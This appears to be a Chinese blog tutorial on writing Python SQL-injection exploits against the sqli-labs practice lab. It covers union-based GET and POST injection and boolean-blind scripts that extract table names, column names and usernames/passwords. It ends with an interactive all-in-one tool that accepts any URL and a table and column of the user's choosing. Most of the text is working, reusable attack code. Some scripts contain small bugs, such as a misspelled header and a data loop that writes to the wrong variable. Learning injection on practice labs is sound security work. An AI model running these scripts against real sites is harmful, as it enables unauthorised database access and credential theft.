Exp编写

GET类型的SQL注入exp编写

最近学了点Python基础,准备拿Python来作为以后编写exp&poc的语言

今天就拿了Sqli-labs第一关入手,这里是get类型的sql注入exp编写

具体的exp如下

1
2
3
4
5
6
7
8
9
import requests
import re
url='http://sql.com/Less-1/'
payload="?id=-1' union select 1,group_concat('~',username,',',password,'~'),3 from users --+"
all = str(url) + str(payload)
res = requests.get(all)
text=res.text
result=re.findall('~(.*?)~',text)
print(result)

引入re和requests的库,然后初始化好我们的payload

这里把url和payload拼接好,先转化成str型

然后得到响应以后的网页的源代码

然后利用正则匹配去匹配我们的数据

image-20210730184722700

POST类型的SQL注入exp编写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
import re
payload="1' union select 1,group_concat('~',username,',',password,'~') from users #"
response=requests.post(
url='http://sql.com/Less-11/',
headers={
'Conternt-Type':'application/x-www-form-urlencoded;charset=UTF-8'
},
data={
'uname':payload,
'passwd':1,
'submit':'Submit'
}
)
text=response.text
print(re.findall('~(.*?)~',text))

这里是拿的sqli-labs第11关做的演示,使用时只需要替换payload即可

方法和get类型差不多,只是requests.get改为requests.post

唯一的不同就是post类型要输入headers和data,get类型就只要把url和payload拼接起来

image-20210730191016106

基于布尔盲注的GET型注入exp编写

这里拿sqli-labs第八关来演示

这里使用布尔盲注,先上爆当前数据库下数据表名的Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import re
url='http://sql.com/Less-8/'
for x in range(0,5):
table = ''
for i in range(1,30):
for j in range(31,128):
#payload="?id=1' and (select length(database()) ="+str(i)+")--+"
payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
all=str(url)+str(payload)
res = requests.get(all)
text = res.text
content='You are in'
result=(text.find(content))
if (result!=-1):
table=table+chr(j)
print("第"+str(x+1)+"个表的表名是:"+table)
print('结束')

接下来是爆列名的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import re
url='http://sql.com/Less-8/'
for x in range(0,10):
column = ''
for i in range(1,30):
for j in range(31,128):
#payload="?id=1' and (select length(database()) ="+str(i)+")--+"
#payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
payload="?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
all=str(url)+str(payload)
res = requests.get(all)
text = res.text
content='You are in'
result=(text.find(content))
if (result!=-1):
column=column+chr(j)
print("第"+str(x+1)+"个列的列名是:"+column)
print('结束')

爆数据的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import re
url='http://sql.com/Less-8/'
for x in range(0,10):
value = ''
for i in range(1,30):
for j in range(31,128):
#payload="?id=1' and (select length(database()) ="+str(i)+")--+"
#payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
#payload="?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
payload = "?id=1' and (select ascii(substr((select username from users limit " + str(x) + ",1) ," + str(i) + ",1)) = " + str(j) + ") --+"
all=str(url)+str(payload)
res = requests.get(all)
text = res.text
content='You are in'
result=(text.find(content))
if (result!=-1):
column=column+chr(j)
print("第"+str(x+1)+"个值是:"+value)
print('结束')

这里一个注入点用三个exp比较麻烦,我看看能不能优化一下搞成一个exp,上面的exp中的x,j,i根据实际表,列的多少自行替换

这里我又写了一个三合一的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
url=input("输入需要注入的URL:")
print("1.爆当前数据库的数据表名")
print("2.爆指定数据表的列名")
print("3.爆出数据库里的数据")
print("输入你要使用的功能(输入数字1,2或者3):")
select=input("请输入你选择的功能:")
if (select=='1'):
for i in range(0,5):#数据表个数
table=''
for j in range(0,30):#数据表长度
for k in range(31,128): #数据表单个字符的ascii值
payload = "?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1) ," + str(j) + ",1)) = " + str(k) + ") --+"
all = str(url) + str(payload)
res = requests.get(all)
text = res.text
content = 'You are in'
result = (text.find(content))
if (result != -1):
table = table + chr(k)
print("第" + str(i + 1) + "个表的表名是:" + table)
if (select=='2'):
for a in range(0,5):#列的个数
column = ''
for b in range(0, 30): # 列长度
for c in range(31, 128): # 数据表单个字符的ascii值
payload = "?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(a)+",1) ,"+str(b)+",1)) = "+str(c)+") --+"
all = str(url) + str(payload)
res = requests.get(all)
text = res.text
content = 'You are in'
result = (text.find(content))
if (result != -1):
column=column+chr(c)
print("第" + str(a + 1) + "个列名是:" + column)
if (select=='3'):
zd=input("要爆哪一列的数据:")
biao=input("要爆哪一个表的数据:")
for d in range(0,5):#值的个数
value = ''
for e in range(0, 30): # 列长度
for f in range(31, 128): # 数据表单个字符的ascii值
payload = "?id=1' and (select ascii(substr((select "+zd+" from "+biao+" limit " + str(d) + ",1) ," + str(e) + ",1)) = " + str(f) + ") --+"
all = str(url) + str(payload)
res = requests.get(all)
text = res.text
content = 'You are in'
result = (text.find(content))
if (result != -1):
value = value + chr(f)
print("第" + str(d + 1) + "个值是:" + value)